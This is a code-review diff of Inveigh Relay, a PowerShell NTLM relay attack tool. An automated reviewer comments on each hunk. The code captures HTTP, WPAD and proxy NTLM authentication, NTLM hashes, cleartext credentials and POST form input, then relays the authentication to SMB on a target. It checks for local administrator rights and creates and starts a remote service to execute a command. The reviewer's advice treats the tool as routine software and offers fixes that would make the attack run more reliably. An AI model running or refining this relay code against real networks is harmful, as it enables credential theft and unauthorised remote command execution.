- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
- [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$Usernames = "",
+ [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
[parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$true)][String]$Command = "",
[parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
[parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
[parameter(Mandatory=$false)][String]$Service,
- [parameter(Mandatory=$true)][String]$Command = "",
[parameter(Mandatory=$true)][String]$Target = "",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][Switch]$SMB1,
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
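Review bot: `[Int]$ConsoleQueueLimit = "-1"` gives an integer parameter a string default; write it as `-1` so the meaning is not hidden behind a type coercion (the `""` defaults on the other `[Int]` parameters left as context have the same smell). `$Command` is declared `Mandatory=$true` and also given a default of `""`; a default on a mandatory parameter is never used, so one of the two should go. Renaming `$OutputDir` to `$FileOutputDirectory` breaks every existing caller and wrapper that passes the old name; adding `[Alias("OutputDir")]` to the new parameter keeps them working without carrying two code paths.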
@@ -188,30 +202,33 @@ if ($invalid_parameter)
throw
}
+$inveigh_version = "1.3"
+
if($ProxyIP -eq '0.0.0.0')
{
$proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
}
-if(!$OutputDir)
+if(!$FileOutputDirectory)
{
$output_directory = $PWD.Path
}
else
{
- $output_directory = $OutputDir
+ $output_directory = $FileOutputDirectory
}
if(!$inveigh)
{
$global:inveigh = [HashTable]::Synchronized(@{})
+ $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+ $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
$inveigh.log = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
- $inveigh.cleartext_list = New-Object System.Collections.ArrayList
- $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_list = New-Object System.Collections.ArrayList
$inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
}
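Review bot: `$inveigh.POST_request_list` is only created inside `if(!$inveigh)`, so a session in which an earlier Inveigh build already populated the global synchronized hashtable will run this version with that key missing, and the first `.Add()` on it will fail at runtime rather than at startup. Give newly introduced keys their own existence check (for example `if(!$inveigh.POST_request_list)`), or store a schema version in the hashtable and re-create it when the version changes. The hard-coded `$inveigh_version = "1.3"` should likewise live in one place if the other script that shares this hashtable reports a version too.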
@@ -224,22 +241,25 @@ if($inveigh.relay_running)
if(!$inveigh.running)
{
+ $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
$inveigh.console_queue = New-Object System.Collections.ArrayList
- $inveigh.status_queue = New-Object System.Collections.ArrayList
+ $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
- $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
- $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
- $inveigh.console_output = $false
+ $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.status_queue = New-Object System.Collections.ArrayList
$inveigh.console_input = $true
+ $inveigh.console_output = $false
$inveigh.file_output = $false
$inveigh.HTTPS_existing_certificate = $false
$inveigh.HTTPS_force_certificate_delete = $false
+ $inveigh.log_output = $true
+ $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
- $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+ $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
}
if($StartupChecks -eq 'Y')
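Review bot: `$inveigh.log_output = $true` is set here as a default but is unconditionally reassigned a few lines later from `$LogOutput` in the startup-message block, so this assignment is dead; drop it or make the later block the single place the flag is derived. Minor naming point: the key is `POST_request_out_file` while the file is `Inveigh-FormInput.txt`; using one name for both makes the log easier to correlate with the output file on disk.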
@@ -298,6 +318,7 @@ elseif($Tool -eq 2) # PowerShell Empire
$inveigh.output_stream_only = $true
$inveigh.console_input = $false
$inveigh.newline = "`n"
+ $LogOutput = "N"
$ShowHelp = "N"
switch ($ConsoleOutput)
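Review bot: forcing `$LogOutput = "N"` for Tool 2 silently discards an explicit `-LogOutput Y`; since this mode also disables console input, a status-queue line saying that in-memory logging is off for this tool mode would tell the operator why the in-memory log stays empty instead of leaving them to guess.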
@@ -328,8 +349,22 @@ else
}
# Write startup messages
-$inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null
-$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null
+$inveigh.status_queue.Add("Inveigh Relay $inveigh_version started at $(Get-Date -format 's')") > $null
+
+if($FileOutput -eq 'Y')
+{
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay $inveigh_version started") > $null
+}
+
+if($LogOutput -eq 'Y')
+{
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay started") > $null
+ $inveigh.log_output = $true
+}
+else
+{
+ $inveigh.log_output = $false
+}
if($firewall_status)
{
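Review bot: the in-memory log entry still reads "Inveigh Relay started" while the status and file-log entries were updated to "Inveigh Relay $inveigh_version started"; add `$inveigh_version` to the `$inveigh.log.Add` line so the three records agree. The file-log line here is gated on `$FileOutput -eq 'Y'` whereas every scriptblock below gates on `$inveigh.file_output`; gating on the same flag everywhere avoids the two drifting apart if the flag is ever toggled after startup.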
@@ -351,12 +386,10 @@ if($HTTP -eq 'Y')
if($HTTP_port_check)
{
$HTTP = "N"
- $inveigh.HTTP = $false
$inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
}
else
{
- $inveigh.HTTP = $true
$inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null
if($HTTPIP)
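Review bot: dropping the `$inveigh.HTTP = $true/$false` assignments here (and in the next hunk) is only safe if nothing else reads that key; the hashtable is `$global:inveigh`, shared with the other Inveigh script and with anything that reports listener state, so grep for reads of `.HTTP` before merging, or leave the assignment in place if the key is part of the shared-state contract.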
@@ -373,7 +406,6 @@ if($HTTP -eq 'Y')
}
else
{
- $inveigh.HTTP = $false
$inveigh.status_queue.Add("HTTP Capture/Relay = Disabled") > $null
}
@@ -486,6 +518,17 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
$inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
+ if($WPADAuth -eq "NTLM")
+ {
+ $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($WPADAuthIgnore.Count -gt 0)
+ {
+ $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null
+ }
+
+ }
+
}
if($Proxy -eq 'Y')
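Review bot: the `Where-Object {$_ -and $_.Trim()}` filter drops blank entries but keeps surrounding whitespace on the ones it retains, so a list given as "Firefox, Chrome" yields " Chrome" and the later user-agent match will miss it; follow the filter with `ForEach-Object { $_.Trim() }` and wrap the result in `@(...)` so it stays an array when only one entry survives. The filtering also runs only when `$WPADAuth -eq "NTLM"`, which is fine as long as no other path consumes `$WPADAuthIgnore`. The blank line before the closing brace of the inner `if` is a style nit.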
@@ -659,7 +702,7 @@ $process_ID = $process_ID -replace "-00-00",""
# Begin ScriptBlocks
-# Shared Basic functions ScriptBlock
+# Shared Basic Functions ScriptBlock
$shared_basic_functions_scriptblock =
{
@@ -692,7 +735,7 @@ $shared_basic_functions_scriptblock =
}
-# Irkin functions ScriptBlock
+# Irkin Functions ScriptBlock
$irkin_functions_scriptblock =
{
function ConvertFrom-PacketOrderedDictionary
@@ -1430,7 +1473,7 @@ $irkin_functions_scriptblock =
}
-# SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response
+# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge
$SMB_NTLM_functions_scriptblock =
{
function SMBNTLMChallenge
@@ -1498,11 +1541,21 @@ $SMB_relay_challenge_scriptblock =
if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03'))
{
$inveigh.console_queue.Add("SMB relay disabled due to SMB signing requirement on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")])
$SMB_relay_socket.Close()
$SMB_client_receive = $null
$inveigh.SMB_relay = $false
$SMB_client_stage = 'exit'
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")
+ }
+
}
}
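Review bot: the same message is now written three times (console queue, file queue, in-memory log) with the text duplicated in each call, and this pattern repeats in every logging hunk below; a small helper in the shared functions scriptblock that takes the message once and fans it out according to `$inveigh.file_output` and `$inveigh.log_output` would remove the duplication and stop the copies from diverging, which already happens in a later hunk where one copy loses its timestamp. The `.Add()` calls here are also not redirected to `$null`, so the returned index is emitted into the runspace's output stream; harmless today, but noisy if that output is ever collected.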
@@ -1611,22 +1664,42 @@ $SMB_relay_response_scriptblock =
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
}
- $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_relay_response_stream.Flush()
- $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00'))
{
$inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
+ }
+
}
else
{
$inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")])
$inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target")
$SMB_relay_failed = $true
$SMB_relay_socket.Close()
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
+ }
+
}
if(!$SMB_relay_failed)
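Review bot: removing `> $null` from `$SMB_relay_response_stream.Read(...)` (and from every `$SMB_client_stream.Read(...)` in the hunks that follow) means the byte count `Read` returns is now emitted as pipeline output instead of discarded, and, more importantly, it is still never checked: the very next line parses fixed offsets such as `$SMB_client_receive[12..15]` from a buffer that may hold a short or zero-length read, which is exactly when a stale or misparsed status field makes the relay report success or failure wrongly. Capture the count (`$bytes_read = $SMB_client_stream.Read(...)`) and leave the stage when it is 0 or smaller than the highest offset about to be read. Dropping `> $null` on `Write` is fine, since it returns nothing.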
@@ -1709,9 +1782,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'CreateAndXRequest'
}
@@ -1726,9 +1799,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'RPCBind'
}
@@ -1745,9 +1818,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadAndXRequest'
$SMB_client_stage_next = 'OpenSCManagerW'
}
@@ -1763,9 +1836,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = $SMB_client_stage_next
}
@@ -1783,9 +1856,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadAndXRequest'
$SMB_client_stage_next = 'CheckAccess'
}
@@ -1796,11 +1869,20 @@ $SMB_relay_response_scriptblock =
if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
{
$inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")])
$SMB_service_manager_context_handle = $SMB_client_receive[88..107]
$packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
+ }
+
if($SCM_data.Length -lt $SMB_split_index)
{
$SMB_client_stage = 'CreateServiceW'
@@ -1814,8 +1896,18 @@ $SMB_relay_response_scriptblock =
elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
{
$inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")])
$SMB_relay_failed = $true
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
+ }
+
}
else
{
@@ -1838,9 +1930,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadAndXRequest'
$SMB_client_stage_next = 'StartServiceW'
}
@@ -1861,9 +1953,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
if($SMB_split_stage_final -le 2)
{
@@ -1893,9 +1985,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
if($SMB_split_stage -ge $SMB_split_stage_final)
{
@@ -1921,9 +2013,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadAndXRequest'
$SMB_client_stage_next = 'StartServiceW'
}
@@ -1933,8 +2025,21 @@ $SMB_relay_response_scriptblock =
if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00')
{
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
+ $inveigh.log_file_queue.Add("Trying to execute SMB relay command on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
+ $inveigh.log.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
+ }
+
$inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")])
+ $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target")
$SMB_service_context_handle = $SMB_client_receive[92..111]
$packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
$packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle
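Review bot: the second `log_file_queue.Add` in this hunk, `"Trying to execute SMB relay command on $Target"`, is missing the `$(Get-Date -format 's') - ` prefix that the matching `$inveigh.log.Add` line and every other file-queue entry carry; add it so the log file stays parseable by timestamp. The blank line directly after the opening `{` is a style nit.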
@@ -1948,19 +2053,27 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target") > $null
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("Trying to execute SMB relay command on $Target")]) > $null
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadAndXRequest'
$SMB_client_stage_next = 'DeleteServiceW'
}
elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00')
{
$inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")])
$SMB_relay_failed = $true
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
+ }
+
}
else
{
@@ -1975,12 +2088,32 @@ $SMB_relay_response_scriptblock =
if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00')
{
$inveigh.console_queue.Add("SMB relay command executed on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
+ }
+
}
